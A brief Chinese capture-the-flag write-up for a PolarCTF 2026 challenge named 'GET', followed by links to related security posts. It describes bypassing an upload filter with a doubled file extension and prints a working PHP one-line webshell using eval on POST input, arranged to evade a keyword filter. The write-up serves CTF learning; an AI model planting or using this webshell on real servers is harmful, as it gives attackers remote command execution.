【PolarCTF2026年春季挑战赛】GET

直接上传一个php试试

文件名后缀双写可以绕过

可以解析,我们上传一句话木马

提示出现了$_POST'cmd'

那么用下面的webshell,避免POST和cmd一起出现

php 复制代码
<?php $x = $_POST; @eval($x['cmd']); ?>

上传成功,访问一下

得到flag{73121d2832f501293a2e661c4d3a082f}

相关推荐
Latticy6 小时前
vulnhub系列靶机-mrRobot
web安全·网络安全·渗透测试
白猫不黑9 小时前
网络安全/信息安全专业学习路线与入行指南:从大学到岗位的完整规划
网络·学习·安全·web安全·网络安全·黑客技术
xierui12312310 小时前
AI Agent 隐私架构:本地化重点为什么是登录态与执行权限
java·人工智能·网络安全·架构
Chockmans12 小时前
春秋云境CVE-2025-49113
安全·web安全·网络安全·网络攻击模型·安全威胁分析·春秋云境·cve-2025-49113
白猫不黑12 小时前
从运维到网络安全:转行优势、路径与薪资前景全解析
运维·网络·web安全·网络安全·信息安全·渗透测试
AI备忘录13 小时前
(十一)DHCP 配置命令五厂商对照:华为 华三 锐捷 迈普 思科
服务器·网络·网络协议·网络安全·华为
0xBADCODE14 小时前
Flask SSTI读SECRET_KEY+伪造Session:税务系统渗透全流程
前端·后端·python·安全·web安全·网络安全·flask
网安蟹佬霸1 天前
OSINT开源情报收集实战:从信息搜集到资产测绘(2026最新万字保姆级指南)
前端·网络·安全·web安全·网络安全·开源
J_bean1 天前
阐述软件开发中的安全风险与防范机制
网络安全·安全风险·安全防范机制
游戏开发爱好者81 天前
WebSocket 抓包怎么查看内容?从握手到消息帧完整解读
网络协议·计算机网络·网络安全·ios·adb·https·udp